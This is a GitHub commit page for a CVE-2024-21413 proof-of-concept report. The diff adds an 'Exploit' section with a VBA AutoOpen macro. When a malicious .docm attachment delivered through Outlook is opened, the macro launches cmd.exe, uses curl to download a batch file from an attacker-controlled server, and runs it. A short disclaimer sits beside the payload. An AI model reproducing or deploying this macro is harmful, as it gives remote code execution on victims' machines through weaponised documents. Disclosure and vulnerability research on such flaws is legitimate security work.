Skip to content

Commit

Permalink
Update report.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
nu11secur1ty authored Mar 22, 2024
1 parent 0cb278b commit 8494764
Showing 1 changed file with 10 additions and 0 deletions.
10 changes: 10 additions & 0 deletions 2024/CVE-2024-21413/docs/report.txt
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,16 @@ By sending a malicious (.docm) file, to the victim using the Outlook mail – ap

STATUS: MEDIUM- Vulnerability

## Exploit:
The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd).
I am not responsible if someone breaks someone's system. You will respond FRONT OF THE LAW!

```
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus)
End Sub
```

## Source:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2024/CVE-2024-21413)

Expand Down

0 comments on commit 8494764

Please sign in to comment.